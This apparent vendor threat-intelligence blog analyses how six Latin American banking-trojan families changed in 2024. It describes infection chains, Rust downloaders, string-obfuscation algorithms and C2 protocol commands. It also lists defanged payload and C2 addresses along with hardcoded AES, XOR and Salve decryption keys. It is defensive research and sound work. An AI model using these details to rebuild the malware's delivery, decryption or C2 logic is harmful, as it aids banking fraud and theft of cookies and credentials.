A Look Back: The Evolution of Latin American eCrime Malware in 2024

The Latin American (LATAM) cybercrime landscape continues to evolve as adversaries refine their tactics, techniques and procedures (TTPs) to bypass defenses and expand their reach.

Last year, we wrote a blog detailing our LATAM cybercrime observations throughout 2023. In this blog, we examine the significant updates observed in 2024 across prominent LATAM malware families, including Mispadu, Kiron, Caiman, Culebra, Salve and Astaroth.

Key Insights

• Adopting Modern Techniques: LATAM-based malware developers are leveraging modern programming languages like Rust to improve evasion capabilities and hinder analysis.
• Consistent Strategies: Multi-stage infection chains, malspam campaigns and phishing websites remain core components of their operations, primarily targeting Spanish- and Portuguese-speaking customers of LATAM financial institutions (FIs).
• Collaborative Efforts: Evidence of overlapping techniques and tools highlights a shared knowledge base within the LATAM cybercrime ecosystem.

In 2024, LATAM-based threat actors demonstrated a clear focus on countering traditional detection methods. For instance, their exclusive use of Rust in downloader components highlights efforts to adapt to modern cybersecurity defenses.

At the same time, many TTPs remain consistent, with multi-stage infection chains, phishing campaigns and malspam used to target FIs across the region. These enduring TTPs, combined with innovative tools, show the adaptive nature of these cybercriminals.

Among the notable updates, Kiron emerged as the most actively developed malware family of 2024. Developers introduced new delivery mechanisms, including a browser-stealing extension, and briefly experimented with Rust-based downloaders. Additionally, Kiron campaigns mirrored the TTPs of SAMBA SPIDER (the operator of Mispadu), underscoring collaboration and shared expertise among LATAM threat actors.

This blog delves deeper into the technical advancements observed across these malware families throughout 2024.

Deep Dive: Evolving LATAM Malware Families

The malware families analyzed in this blog — Mispadu, Kiron, Caiman, Culebra, Salve and Astaroth — demonstrate the adaptability of LATAM-based cybercriminals. Each family reflects unique innovations, from the adoption of new programming languages like Rust to new obfuscation techniques and updated delivery mechanisms. Below, we explore how each of these malware families has evolved in 2024 and highlight their specific TTPs.

Mispadu: Infection Chain Updates

Community Identifiers: Mispadu, URSA
Operator: SAMBA SPIDER
Country of Origin: Brazil
Type: Banking Trojan and Information Stealer

April 2024: HTA Dropper Variant

SAMBA SPIDER launched a phishing campaign impersonating Mexico's electronic invoice system, Comprobante Fiscal Digital por Internet (CFDI). Malspam emails redirected users to download an HTA dropper (a variant of the 2023 version) containing obfuscated VBScript (VBS) to retrieve and execute the first-stage Mispadu downloader (tracked as D1). The campaign distributed Mispadu version 96.

June 2024: JavaScript (JS)-Based Downloader

In early June 2024, the malware developers introduced a new JS component, which is retrieved by the HTA component (Figure 2). Distributed using the filename prefix ❉𝔽𝕒𝕔𝕥𝕦𝕣𝕒❉_, the updated infection chain delivered Mispadu version 97, evolving into version 100 by late 2024.

Kiron: Rust Adoption and Browser Extensions

Community Identifiers: Grandoreiro
Type: Banking Trojan and Information Stealer

July 2024: NestoLoader Integration

Kiron was distributed via NestoLoader, which is a loader written in JPHP — a PHP implementation that runs in the Java virtual machine (VM). JPHP is not commonly used to develop eCrime malware because of the language’s recent introduction and limited feature set, and it was likely used to hinder analysis efforts and evade detection.

NestoLoader samples used to deliver Kiron were configured to communicate with the command-and-control (C2) server massgrave[.]site. Public telemetry reveals that NestoLoader deployed Kiron’s widely used Delphi downloader, which retrieved its payload from http[:]//108.165.96[.]26:8080/19b[.]zip. This Delphi downloader has been a staple for Kiron operators since 2019, with variants employed across multiple campaigns.

August 2024: Rust-Based Downloader

In early August 2024, Kiron operators transitioned from using Delphi-based downloaders to a Rust-based alternative, which distributed via NestoLoader samples configured to communicate with the C2 domain massgrave[.]site. In this updated delivery chain, the NestoLoader C2 provided a JSON response containing a Base64-encoded legitimate executable and dynamic-link library (DLL).

To execute the Rust-based downloader DLL, NestoLoader uses search-order hijacking with the legitimate executable. This new Rust-based downloader was exclusively used to deliver Kiron.

The downloader retrieved the next-stage component from http[:]//192.101.68[.]150/bb08[.]zip, which hosted an AES-encrypted ZIP file. Decryption relied on a hardcoded key (00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 11 12 13 14 15 16 17 18 19 1a 1b 1c 1d 1e 1f) and initialization vector (1a 2b 3c 4d 5e 6f 00 11 22 33 44 55 66 77 88 99) using AES in CBC mode, which was consistent across all analyzed samples.

This ZIP file contained a Kiron core component configured with the prefix pkc, highly likely identifying a specific malware operator targeting customers of Brazilian and Mexican FIs. Kiron’s developers leveraged a custom domain generation algorithm (DGA) that combined the prefix with the current date to calculate its C2 server domain.

Malware Operators

Analysis of Kiron samples from this activity reveals the use of two distinct string prefixes: z and pkc. The z prefix has been associated with Kiron operators since early 2024, while samples using the pkc prefix were observed between August and October 2024.

Kiron builds with the pkc prefix exclusively target customers of FIs in Brazil and Mexico, whereas builds with the z prefix have a broader geographic focus. These samples target FIs in Chile, Peru, Ecuador, Argentina, Brazil, Costa Rica, Mexico, the U.K., Germany, Portugal and Spain. The specific targets are explicitly defined in Kiron’s hardcoded strings.

Overlap with SAMBA SPIDER

In late September 2024, Kiron operators began distributing the malware using a fourth-stage infection chain that closely mirrored SAMBA SPIDER’s June 2024 TTPs. This overlap suggests either the same actor was responsible for both activities or Kiron operators leveraged SAMBA SPIDER’s tooling to replicate Mispadu’s infection chain. This assessment is made with moderate confidence, based on similarities in first-stage components and filename patterns.

Kiron operators used HTA file naming conventions such as ❉VER CUENTA❉_, ❉𝔸𝕣𝕔𝕙𝕚𝕧𝕠𝕤❉_, and ❉processo❉_, which align closely with SAMBA SPIDER’s Mispadu naming scheme of ❉<STRING_IN_SPANISH>❉_<RANDOM_CHARACTERS>.hta. These shared patterns further underline the connection between the two sets of activities.

October 2024: Stealer Enhancement 

In mid-October 2024, a Kiron core component update introduced new stealer features aimed at gathering user data. This update included:

• A browser-history grabber, derived from NirSoft’s web browser history tool, to collect users’ navigation data.
• A Chromium-based browser-stealer extension designed to exfiltrate user cookies and email addresses.

Both components were embedded in the Portable Executable (PE) .rsrc section as encrypted ZIP files. To decrypt these archives, the malware utilized Kiron’s custom algorithm with the XOR key 0x8EF6 — a method consistent with the algorithm used by Kiron’s Delphi downloader for decrypting final-stage ZIP files.

Updated Obfuscation Techniques

Kiron core component samples from October 2024 introduced a new Base64-based obfuscation layer for string encryption while retaining the previously established XOR-based algorithm. This hybrid approach underscores the developers' ongoing efforts to complicate detection and analysis.

Browser-Stealer Extension Features

The browser-stealer extension comprises two JS files with distinct functionalities:

• content.js: Scans the current visited webpage’s body for email addresses and forwards any identified addresses to background.js.
• background.js:
  • Sends content.js collected email addresses to Kiron’s core component.
  • Monitors updates to webmail site-browser tabs to capture cookies, which are then exfiltrated to the C2 server.

Caiman: Advanced String Obfuscation

Community Identifiers: Grandoreiro
Type: Banking Trojan and Information Stealer

In September 2023, Caiman developers implemented a custom string obfuscation process designed to enhance the malware’s defense evasion capabilities. This new method marked a departure from the widely recognized XOR-based algorithm commonly used by other LATAM malware families.

String Obfuscation

In June 2024, Caiman developers introduced a sophisticated string decryption process (Figure 3) that combines Base64 encoding, a pseudo-random number generator (PRNG) and a custom XOR-based algorithm for enhanced obfuscation.

Seed Generation

Caiman begins by Base64 decoding an encrypted string and extracting the first two and last two characters. These characters are appended and their integer representation summed twice to generate a seed value for initializing the PRNG.

XOR Key Creation

The malware uses a hardcoded dictionary of characters: !@#$%^&*()_+-=[]{}|;:,.<>?. This dictionary is processed in reverse through the PRNG initialized with the seed value, producing the final XOR key required for string decryption.

Decryption

Using the calculated XOR key, Caiman extracts a single character (a shift) from the encrypted string. A custom XOR operation applies this shift to decrypt the string, producing a Base64-encoded result. This result is then decoded to reveal the plaintext string (Table 1).

Culebra: Downloader Updates

Community Identifiers: Mekotio
Type: Banking Trojan

In late July 2024, Culebra developers introduced updates to the malware’s downloader component, a two-stage component written in batch and PowerShell (PS). Though the updated downloader incorporates techniques from the Delphi-based version observed in 2023 and early 2024, it also includes several notable refinements.

Batch Loader

The first stage is an obfuscated batch script containing strings of integers and a custom alphabet that varies between samples. This alphabet is employed in a permutation cipher to decrypt and execute the PS downloader.

PS Downloader

The second stage uses string obfuscation based on the widely recognized XOR algorithm, a common feature of LATAM-based banking trojans. The second stage ensures that only one malware instance is running by creating a directory in %LOCALAPPDATA% with a date-based pattern (DDYYMM). The second stage also creates a randomly named nine-character folder within %LOCALAPPDATA% to store the core component.

The PS downloader performs extensive system reconnaissance, collecting:

• Geolocation
• Hostname
• Username
• Windows version
• Antivirus information
• Public IP address

This information is sent to the C2 server over a TCP connection, awaiting a response with the command INFO_RECEIVED to confirm its validity. Once validated, the downloader issues the command SEND_FILE to retrieve a ZIP archive containing the Culebra core component. The C2 server responds with the command string FILE_SENDING, appending the ZIP archive to the response.

Protocol Enhancements

Following the new downloader introduction, the malware developers introduced additional updates:

• September 2024: The communication protocol was updated to introduce the command string ZIP_FILE, which specifies a filename. The downloader now uses this filename to fetch the ZIP archive via an HTTP GET request to the URL pattern: http://<C2_SERVER>/arquivados3/<FILENAME>.
• October 2024: Developers further refined the protocol, replacing the SEND_FILE and INFO_RECEIVED commands with EIAD_VEAD and CAEIDAH_DOMU, respectively.

Salve: A Likely Hiatus to Experiment with Rust

Community Identifiers: Casbaneiro
Type: Banking Trojan

In mid-March 2024, Salve developers updated their infection chain to include a Rust-based downloader, marking a notable shift in their TTPs. This activity followed a likely hiatus that began in November 2023, potentially signaling a period of adaptation and experimentation.

Rust-Based Downloader Details

The newly introduced downloader lacked advanced anti-analysis features, suggesting it was primarily designed for functionality rather than stealth. The analyzed downloader was configured to:

• Download URL: https[:]//public.adobecc[.]com/files/1CBZREKGR3QFQLNIAB3CPYSQNZAFFF?content_disposition=attachment;filename=%22Upload_20240311-130634.zip
• Beacon URL: http[:]//38.54.57[.]26/lu/conta.php

While the download URL hosts the final payload, the beacon likely serves to track infection metrics by counting the total number of successful infections.

VMProtect-Packed Salve Build

On March 22, 2024, the downloader was observed delivering a VMProtect-packed Salve build, configured to use the dead-drop resolver URL: https[:]//api.cacher[.]io/raw/e9972f773263412223fe/d5186951e0cbbf25c69b/a.

The resolver contained encrypted content (Figure 4), which decrypted to reveal the C2 server address (Figure 5) using the widely recognized LATAM XOR algorithm and Salve's well-known decryption key: 584HG4841U987IO9876LS21345K985126FGD4554Y21A87F9.

Astaroth: Minor Refinements

Community Identifiers: Astaroth, Guildma
Type: Banking Trojan and Information Stealer

Updates in April 2024 focused on minor refinements, including:

• New string obfuscation for Windows Shortcut (LNK) downloaders. The malware now uses the byte representation to encode strings
• Added new fields to refactor the installer’s C2 protocol
• Updated the configuration file by renaming existing fields

In November 2024, Astaroth developers included a XOR key derivation process to decrypt strings in the core component. As of this writing, Astaroth operators are distributing version 376 of the malware.

Conclusion

The evolution of LATAM-based malware in 2024 highlights the adaptability and ingenuity of its developers, who continue to refine their tools to sustain successful eCrime campaigns. By combining modern advancements with proven TTPs, these updates provide cybersecurity researchers with valuable opportunities to continue detecting and tracking these threats.

One significant area of innovation is obfuscation techniques, with malware families like Caiman adopting entirely new algorithms and others — such as Kiron, Culebra and Astaroth — layering additional methods onto the widely used XOR-based approach. This evolution underscores the developers' focus on staying ahead of detection efforts.

The experimentation with Rust downloader components is another notable development, reflecting a willingness to explore modern programming languages for evasion. There is an even chance that developers will continue to use Rust in future campaigns. This assessment is made with low confidence based on the limited use of Rust components and their subsequent abandonment, which suggests uncertainty about its practicality for long-term adoption.

Despite these innovations, Delphi-based components are highly likely to remain a staple of LATAM malware in the near term. This assessment is made with moderate confidence since their reliability and years of use make them a trusted choice for malware operators.

By closely monitoring these developments and leveraging insights into both new and enduring TTPs, the cybersecurity community can remain proactive in mitigating the evolving threats posed by LATAM-based eCrime malware.

Recommendations

To mitigate the risks posed by the activity described in this report, consider implementing the following best practices:

1. Enhance User Awareness:

• Train employees to recognize social engineering techniques and identify phishing emails.
• Emphasize the importance of avoiding the execution of files from untrusted sources.

2. Validate Software Sources:

• Always verify website certificates on download pages to confirm that software originates from a legitimate and trusted source.

3. Strengthen Browser Protections:

• Enable download protection settings in browsers to issue warnings for potentially harmful websites or files.

4. Restrict Script-Based Executions:

• Disable Windows Script Host (WSH) via the Windows Registry on systems where the tool is not required.
• Implement script-enforcement policies using App Control for Business to block the execution of scripts such as PS, VBS and MSHTA.

Learn More

For additional information on CrowdStrike’s in-depth research and real-time access to indicators of compromise (IOCs) like the ones featured in this blog, visit the CrowdStrike Counter Adversary Operations website. CrowdStrike Falcon® Adversary Intelligence provides comprehensive insights, actionable threat data and continuous updates to help you stay ahead of evolving cyber threats.

Equip your team with the intelligence needed to effectively detect, track and mitigate sophisticated malware campaigns. Explore how CrowdStrike can enhance your organization’s defenses today.

Indicators of Compromise

The following table provides a detailed list of IOCs associated with the malware families and campaigns discussed in this blog. These IOCs include hashes, URLs, domains and other artifacts that can be used to identify and mitigate potential threats within your environment.

By incorporating these IOCs into your security tools and monitoring processes, you can enhance your organization’s ability to detect and respond to malicious activity linked to these LATAM-focused eCrime campaigns.

CrowdStrike Intelligence Confidence Assessment

High Confidence: Judgments are based on high-quality information from multiple sources.  High confidence in the quality and quantity of source information supporting a judgment does not imply that that assessment is an absolute certainty or fact. The judgment still has a marginal probability of being inaccurate.

Moderate Confidence: Judgments are based on information that is credibly sourced and plausible but not of sufficient quantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to express that judgments carry an increased probability of being incorrect until more information is available or corroborated.

Low Confidence: Judgments are made where the credibility of the source is uncertain, the information is too fragmented or too poorly corroborated to make solid analytic inferences, or the reliability of the source is untested. Further information is needed for corroboration of the information or to fill known intelligence gaps.

Additional Resources

• Read about the adversaries tracked by CrowdStrike Counter Adversary Operations in the CrowdStrike 2024 Threat Hunting Report.
• Tune into the Adversary Universe podcast, where CrowdStrike experts discuss today's threat actors — who they are, what they’re after and how you can defend against them. 
• Know the adversaries that may be targeting your region or business sector — explore the CrowdStrike Adversary Universe®.
• Learn how CrowdStrike's threat intelligence and threat hunting solutions are transforming security operations to better protect your business.